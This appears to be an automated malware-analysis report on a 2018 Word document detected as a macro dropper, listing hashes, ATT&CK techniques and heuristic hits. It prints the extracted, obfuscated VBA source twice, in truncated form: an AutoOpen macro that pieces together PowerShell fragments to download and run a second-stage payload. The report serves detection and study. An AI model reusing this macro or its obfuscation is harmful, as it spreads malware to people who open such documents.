Office (OLE) malware analysis — malicious · ea9c9af584f9cb74

MALICIOUS

Office (OLE)

125.4 KB Created: 2018-02-08 15:24:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: c40421c0bf674956cc3d8208031cfd5f SHA-1: 6dafeb783989ddccdd100ab771cbb9800ef8392e SHA-256: ea9c9af584f9cb74dbca56020e932b8139550c86e348f50ff89062ac26ada3f0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that executes a Shell command. This macro is designed to download and execute a second-stage payload from a constructed URL. The constructed URL is 'http://smoothcroseFON+FO' which is likely a placeholder or obfuscated domain. The script also constructs the strings 'LhnsueJ1+FON+FONeJ1leJ1+eJ1ting.it/lzCUvVmndRiHzHbQnuZWHDVtcCDMAKAhP' and 'NlMloTLmQXmzNlOftDCeJ1+eJ1 = z4eJ1+eJ1oeJ1+eJ1eWHs+WHsnveJ1+eJ1:\'+\'eJWHs+WHs1+eJ1SwfoRbAtnLkN', which appear to be parts of download URLs or commands. The ClamAV detection 'Doc.Dropper.Agent-6444107-0' further supports its nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6444107-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6444107-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://smoothcroseFON+FO In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22531 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22531 bytes
SHA-256: `65a820cb3c2653c28bef6589783c0ccb8d42c856a70dceac876f9b9ddb19cbd1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "SNZEvvqMIQqt" Sub AutoOpen() On Error Resume Next GswTAvlOs = OODUwpEDM - LqAijMolk / (3152016 + kSVAGjpm - 1629394 + szwofZBz) lwbABVPrQ = nHAibEdviUpJ - REFSrBuBn / (7529803 + wUikRAkOQCwB - 1963464 + XuKjqhJch) KvvCYpWlA = OjHWsdijas - SDvFUHjR / (9397967 + cWnYoWz - 2407481 + uRwjvhPYRF) Application.Run "qaisYwFXn", VhXDbdm IzijUrszz = imTDOmJ - zEHkWCwvTW / (37591 + EjRMoItnSh - 9225770 + AIqHzvSIYv) aNwXajkZX = zZzwVHOFtV - QIjkOLr / (9463344 + ErzJJDNRhM - 634547 + JaYaJslqjMPCt) End Sub Function VhXDbdm() On Error Resume Next iBrzYLLiS = KoncbfzSHvzKCr - XSnsUSfzduczQ / (7268096 + qjCwIcBQRtF - 9940003 + lnBZEHY) RucpGiOK = kpjcfqKiwfj - bFTHDiRVCWz / (2820749 + fMqsDvINA - 1046973 + VVdlrhSNWTYfT) EKFaZwK = WVqCcOqSJAiTq - kaTaAdlhFfdVDl / (8549065 + GjWzjZSKXqzDMd - 1318965 + qXcvAzfqHo) ujMbpV = bvAwzYiB + Mid(("LhnsueJ1+FON+FONeJ1leJ1+eJ1ting.it/lzCUvVmndRiHzHbQnuZWHDVtcCDMAKAhP"), 3, 34) fIPOGwOXBQq = rOLIICJiiVcYFi - IwzIBjrsJHl / (3195759 + tdCjJbzIRnr - 9056711 + LZTnlTcfzc) flnszjP = kvPzWBAX - ikESsPiiXqJH / (2611002 + VSZWWRnAwBr - 9748936 + MAmQnTIra) wcZzzPF = AuWpzHGTDX - uhwfiFwio / (634095 + uCSilaWnEou - 9517886 + bzcqsphnbz) DvLzV = KZHLFZKtz + Mid(("NlMloTLmQXmzNlOftDCeJ1+eJ1 = z4eJ1+eJ1oeJ1+eJ1eWHs+WHsnveJ1+eJ1:'+'eJWHs+WHs1+eJ1SwfoRbAtnLkN"), 18, 64) EBfmruFjo = AUXTVfwPSa - jXDidIl / (9676333 + nSEALwpNZt - 5326943 + fAbfFWXK) nRUaZcjk = XIWRjRhilCbo - khPWHYpiqYzsDW / (5434754 + XlNokPKhibfIjo - 8348086 + TjQtPiP) dWzLDGi = UChjXZfuEiNRNA - UXiofthw / (421423 + zZTGijpWPThi - 5031053 + JwkDEaam) CzNcuBNM = TpkIOKNmR + Mid(("oMnFHvinRoNidCbnMzWHs'+'eJ1+eJ1c eWHs+WHsJ1+eJ1inFON+FON z4oeJ1+eJ1ADCeJ1+eJ1X){try{z'+'4oYYeJ1+W'+'Hs+WHseJ1U.FON+FONdcHDo0WHs+WHseJ1WHs+WHs+eJ1XnWnleJ1+eWHs+WHsJ10XnOeJ1+eJ1adFI0XnledeJ1+eJ1ceJ1+ebfvXW"), 19, 180) wzAhzZbwGv = CYzLnWvYuwj - mzXijIdubHM / (1240917 + LMCvmJjdCXlJkw - 6415371 + CfnmsIYJ) jRPhO = AwJJDvLtP - KtcIpzBjZlU / (9838796 + wkYbZTDC - 7597395 + fmMXTwcaQUUXP) BObIWUZnX = XwmrZzXuAk - YfTmZLZWB / (9402834 + cchkzLEisY - 4055190 + EahLdoUllcJvTI) kUMsIBV = XvWhujFnD + Mid(("AQnMwD);z4oSrlQTqdJjPjWfSYbiOsCat"), 7, 6) GvUUr = WroDfOLsAwijL - zTmQpWMVwYGW / (666902 + XBpmIvP - 7041598 + rntdzIzSiR) FAjNvWq = WqYXMpdBt - zJLGUwHvY / (3148093 + PwucvtNMAF - 4664653 + mijcRaS) cWLBkllr = NqDuiiXiJ - XJBwHsduQwPot / (2185074 + EZXoWqUGwG - 4664331 + AwNVjCKiODpbnw) hDrsdToXu = rIuAOcBWKKoBM + Mid(("WYLmWVbAOpDWiwiGNSB + (eJ1+eJ1beJ1'+'+eJ1XheJ1+FON+WHs+WHsFONeJ1.ex'+'bXh+bXhebXh);foreach(eJ1+eJ1zeJ1+eJ14oasfWHs+sUPdsbMTrdmw"), 17, 99) luqGlSR = nzCDCpjwdwDbj - idKAjwBXTLkw / (6465212 + BfYEVtPKfLB - 30935 + pVaGuVnPPKYZD) viWSuzRPGH = QjrSFHIwwXwFm - XzzzjELBsF / (8175448 + uLmUzfSFwin - 8542742 + sjsXDHpjQrRLZp) qGLGLHAA = cPomciNzJiXTmj - tKGDrUSioz / (278392 + dTVIapTdjpBQR - 5848175 + jtjnCCswHEWw) XzZIsGPmW = JVBZzsVZIz + Mid(("EAYiuBcvFiAeJ1+eJ1DeJ1+WHsIsAEuubwb"), 11, 16) PQEoQNWw = TDoEIqmMhjl - KzpkVOED / (8276295 + UwpNpitIuYjJi - 9733558 + twNklzZ) REwfl = ribwAIaQtmfjqO - BHSZpNYAQrjbPq / (3763685 + ruzzjOh - 8798847 + UHqWDPN) cnUfvw = DMcSXklTdLF - jLZZhooqQ / (2310325 + ZZYVFhdNcTvLi - 8231889 + TKNiFDcaTIhR) rlACw = JkzoamkdoVw + Mid(("sMKVutfwmAnmr'Ar]90+[CHAr]83),[CHAr]92))'+' WHs).rEplACE(WHsPF3WHs,[sTRIng][cHar]3'+'6).rEplACE(([cHaJmEiutriWnavXSbQYb"), 14, 88) DnHJpp = dAkzvivVicmGkz - FMXQowBvhTEnsU / (9031753 + tFFwaiJmiutv - 9039148 + lpFutDIULzb) qutTIQzJz = DfquCAj - sBiwYWDliuEGAE / (6673326 + iwarZYtGX - 4224323 + dvnrtLAkjKG) qiYTEz = XzWlRuVDzz - MEarVTHYbCr / (4991628 + vCLuATwEbbDrC - 7533387 + LBSffTanSUf) jWAizGHFcaH = OaXOrZDtzPjlA + Mid(("EwRincamE[3,11,2]-JOINWHsWHs)') -replACE'WHs',[cHAR]39-CREpLace ([cHAR]66+[cHAR]105+[cHAR]56),[cHAR]124))jzRiR"), 7, 99) bTsLp = aDfwXkcXzSjf ... (truncated)

SHA-256: 65a820cb3c2653c28bef6589783c0ccb8d42c856a70dceac876f9b9ddb19cbd1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SNZEvvqMIQqt"
Sub AutoOpen()
On Error Resume Next
GswTAvlOs = OODUwpEDM - LqAijMolk / (3152016 + kSVAGjpm - 1629394 + szwofZBz)
lwbABVPrQ = nHAibEdviUpJ - REFSrBuBn / (7529803 + wUikRAkOQCwB - 1963464 + XuKjqhJch)
KvvCYpWlA = OjHWsdijas - SDvFUHjR / (9397967 + cWnYoWz - 2407481 + uRwjvhPYRF)
Application.Run "qaisYwFXn", VhXDbdm
IzijUrszz = imTDOmJ - zEHkWCwvTW / (37591 + EjRMoItnSh - 9225770 + AIqHzvSIYv)
aNwXajkZX = zZzwVHOFtV - QIjkOLr / (9463344 + ErzJJDNRhM - 634547 + JaYaJslqjMPCt)
End Sub
Function VhXDbdm()
On Error Resume Next
iBrzYLLiS = KoncbfzSHvzKCr - XSnsUSfzduczQ / (7268096 + qjCwIcBQRtF - 9940003 + lnBZEHY)
RucpGiOK = kpjcfqKiwfj - bFTHDiRVCWz / (2820749 + fMqsDvINA - 1046973 + VVdlrhSNWTYfT)
EKFaZwK = WVqCcOqSJAiTq - kaTaAdlhFfdVDl / (8549065 + GjWzjZSKXqzDMd - 1318965 + qXcvAzfqHo)
ujMbpV = bvAwzYiB + Mid(("LhnsueJ1+FON+FONeJ1leJ1+eJ1ting.it/lzCUvVmndRiHzHbQnuZWHDVtcCDMAKAhP"), 3, 34)
fIPOGwOXBQq = rOLIICJiiVcYFi - IwzIBjrsJHl / (3195759 + tdCjJbzIRnr - 9056711 + LZTnlTcfzc)
flnszjP = kvPzWBAX - ikESsPiiXqJH / (2611002 + VSZWWRnAwBr - 9748936 + MAmQnTIra)
wcZzzPF = AuWpzHGTDX - uhwfiFwio / (634095 + uCSilaWnEou - 9517886 + bzcqsphnbz)
DvLzV = KZHLFZKtz + Mid(("NlMloTLmQXmzNlOftDCeJ1+eJ1 = z4eJ1+eJ1oeJ1+eJ1eWHs+WHsnveJ1+eJ1:'+'eJWHs+WHs1+eJ1SwfoRbAtnLkN"), 18, 64)
EBfmruFjo = AUXTVfwPSa - jXDidIl / (9676333 + nSEALwpNZt - 5326943 + fAbfFWXK)
nRUaZcjk = XIWRjRhilCbo - khPWHYpiqYzsDW / (5434754 + XlNokPKhibfIjo - 8348086 + TjQtPiP)
dWzLDGi = UChjXZfuEiNRNA - UXiofthw / (421423 + zZTGijpWPThi - 5031053 + JwkDEaam)
CzNcuBNM = TpkIOKNmR + Mid(("oMnFHvinRoNidCbnMzWHs'+'eJ1+eJ1c eWHs+WHsJ1+eJ1inFON+FON z4oeJ1+eJ1ADCeJ1+eJ1X){try{z'+'4oYYeJ1+W'+'Hs+WHseJ1U.FON+FONdcHDo0WHs+WHseJ1WHs+WHs+eJ1XnWnleJ1+eWHs+WHsJ10XnOeJ1+eJ1adFI0XnledeJ1+eJ1ceJ1+ebfvXW"), 19, 180)
wzAhzZbwGv = CYzLnWvYuwj - mzXijIdubHM / (1240917 + LMCvmJjdCXlJkw - 6415371 + CfnmsIYJ)
jRPhO = AwJJDvLtP - KtcIpzBjZlU / (9838796 + wkYbZTDC - 7597395 + fmMXTwcaQUUXP)
BObIWUZnX = XwmrZzXuAk - YfTmZLZWB / (9402834 + cchkzLEisY - 4055190 + EahLdoUllcJvTI)
kUMsIBV = XvWhujFnD + Mid(("AQnMwD);z4oSrlQTqdJjPjWfSYbiOsCat"), 7, 6)
GvUUr = WroDfOLsAwijL - zTmQpWMVwYGW / (666902 + XBpmIvP - 7041598 + rntdzIzSiR)
FAjNvWq = WqYXMpdBt - zJLGUwHvY / (3148093 + PwucvtNMAF - 4664653 + mijcRaS)
cWLBkllr = NqDuiiXiJ - XJBwHsduQwPot / (2185074 + EZXoWqUGwG - 4664331 + AwNVjCKiODpbnw)
hDrsdToXu = rIuAOcBWKKoBM + Mid(("WYLmWVbAOpDWiwiGNSB + (eJ1+eJ1beJ1'+'+eJ1XheJ1+FON+WHs+WHsFONeJ1.ex'+'bXh+bXhebXh);foreach(eJ1+eJ1zeJ1+eJ14oasfWHs+sUPdsbMTrdmw"), 17, 99)
luqGlSR = nzCDCpjwdwDbj - idKAjwBXTLkw / (6465212 + BfYEVtPKfLB - 30935 + pVaGuVnPPKYZD)
viWSuzRPGH = QjrSFHIwwXwFm - XzzzjELBsF / (8175448 + uLmUzfSFwin - 8542742 + sjsXDHpjQrRLZp)
qGLGLHAA = cPomciNzJiXTmj - tKGDrUSioz / (278392 + dTVIapTdjpBQR - 5848175 + jtjnCCswHEWw)
XzZIsGPmW = JVBZzsVZIz + Mid(("EAYiuBcvFiAeJ1+eJ1DeJ1+WHsIsAEuubwb"), 11, 16)
PQEoQNWw = TDoEIqmMhjl - KzpkVOED / (8276295 + UwpNpitIuYjJi - 9733558 + twNklzZ)
REwfl = ribwAIaQtmfjqO - BHSZpNYAQrjbPq / (3763685 + ruzzjOh - 8798847 + UHqWDPN)
cnUfvw = DMcSXklTdLF - jLZZhooqQ / (2310325 + ZZYVFhdNcTvLi - 8231889 + TKNiFDcaTIhR)
rlACw = JkzoamkdoVw + Mid(("sMKVutfwmAnmr'Ar]90+[CHAr]83),[CHAr]92))'+' WHs).rEplACE(WHsPF3WHs,[sTRIng][cHar]3'+'6).rEplACE(([cHaJmEiutriWnavXSbQYb"), 14, 88)
DnHJpp = dAkzvivVicmGkz - FMXQowBvhTEnsU / (9031753 + tFFwaiJmiutv - 9039148 + lpFutDIULzb)
qutTIQzJz = DfquCAj - sBiwYWDliuEGAE / (6673326 + iwarZYtGX - 4224323 + dvnrtLAkjKG)
qiYTEz = XzWlRuVDzz - MEarVTHYbCr / (4991628 + vCLuATwEbbDrC - 7533387 + LBSffTanSUf)
jWAizGHFcaH = OaXOrZDtzPjlA + Mid(("EwRincamE[3,11,2]-JOINWHsWHs)') -replACE'WHs',[cHAR]39-CREpLace ([cHAR]66+[cHAR]105+[cHAR]56),[cHAR]124))jzRiR"), 7, 99)
bTsLp = aDfwXkcXzSjf
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.